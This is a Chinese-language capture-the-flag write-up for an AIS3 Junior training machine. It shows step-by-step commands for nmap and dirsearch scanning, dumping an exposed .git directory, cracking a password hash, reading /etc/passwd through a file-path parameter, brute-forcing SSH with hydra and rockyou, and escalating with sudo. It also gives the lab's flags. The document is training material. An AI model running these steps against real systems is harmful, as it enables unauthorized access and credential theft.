# Ais3 junior Write up - 靶機 ### 連連看網頁 http://10.17.1.9/ ![](https://hackmd.io/_uploads/S1a0erjh2.png) ### 發現不出甚麼東西,利用nmap掃描看看! - kali開啟Terminal ![](https://hackmd.io/_uploads/SJUOWHjnn.png) ``` nmap用法: nmap -sC -sV -Pn {ip} -sC = 腳本掃描 -sV = 版本偵測 -Pn = 不使用ping ``` - 輸入指令nmap -sC -sV -Pn 10.17.1.9 ![](https://hackmd.io/_uploads/ByuxaBs2n.png) - 發現有3個port號,分別為22、80、8080,每個都用dirsearch掃看看 ### Direarch (暴力掃描目錄&文件) ``` dirsearch用法: dirsearch -u {ip} ``` - Port: 22 (dirsearch -u http://10.17.1.9:22/) ![](https://hackmd.io/_uploads/H1Q66Ssh2.png) - 發現甚麼都沒有 - Port: 80 (dirsearch -u http://10.17.1.9:80/) ![](https://hackmd.io/_uploads/SyWke8sh2.png) - 發現可疑路徑(/backend/),進去網站後發現需要帳號密碼登入 ![](https://hackmd.io/_uploads/BJ3DQIi33.png) - 之後繼續利用dirsearch掃後發現.git目錄 ![](https://hackmd.io/_uploads/BJ6hlIshh.png) ### 利用githacker指令把網站的git抓下來 ``` githacker用法: githacker --url {ip} --output-folder {抓下來後放的位置} ``` - 輸入指令 githacker --url http://10.17.1.9:80/backend/.git/ --output-folder . ![](https://hackmd.io/_uploads/B1r0WUs3h.png) ![](https://hackmd.io/_uploads/rkqZzLjn3.png) - 得到8db4fe7b233128d5c37e8874ebf51de0資料夾,進去後發現admin.php和index.php ![](https://hackmd.io/_uploads/By_wzLs3h.png) - cat index.php後發現hash過的密碼:eb0a191797624dd3a48fa681d3061212 ![](https://hackmd.io/_uploads/HktjzUo3h.png) - 利用網站解密後得到密碼為master,觀察index.php程式碼發現帳號為admin,由以上資訊成功登入網頁 ![](https://hackmd.io/_uploads/HkmH4Linn.png) ### 測試/etc/passwd有沒有東西 - /etc/passwd裡放系統用戶的全部信息,包括權限,所以把網址/etc/hosts改成/etc/passwd ![](https://hackmd.io/_uploads/BkcCtIon3.png) - 發現用戶red有著跟root一樣的權限 ### hydra爆破得到red的密碼 ``` hydra用法: hydra -l {user} -P {wordlist} -t 64 -I ssh://{ip} ``` - 輸入指令 : hydra -l red -P /usr/share/wordlists/rockyou.txt -t 64 -I ssh://10.17.1.9:80 ![](https://hackmd.io/_uploads/ryEUHUo22.png) - 密碼為victor ### ssh連線 - 輸入指令 : ssh red@10.17.1.9 ![](https://hackmd.io/_uploads/Sk6orIshn.png) - ls之後看到可疑的txt檔,cat後得出第一個flag ![](https://hackmd.io/_uploads/SJNMILj22.png) ``` flag = AIS3_Junior{YouAreBruteForcer:D:D:D:D:D} ``` ### 提權 - 利用指令sudo su 提權成功(為root) ![](https://hackmd.io/_uploads/B12TL8jh3.png) - 回到根目錄進入root資料夾,看到可疑txt檔,cat後得出第二個flag ![](https://hackmd.io/_uploads/HkxXwLs23.png) ``` flag = AIS3_Junior{First_PenTestXDDDDDDD} ``` - 結束! ### 題外話 - 最一開始namp發現8080port,也有去githacker他的git,抓下來發現是昨天的上課的檔案XD就沒放在Writeup裡惹 ![](https://hackmd.io/_uploads/Sy51YUjhh.png)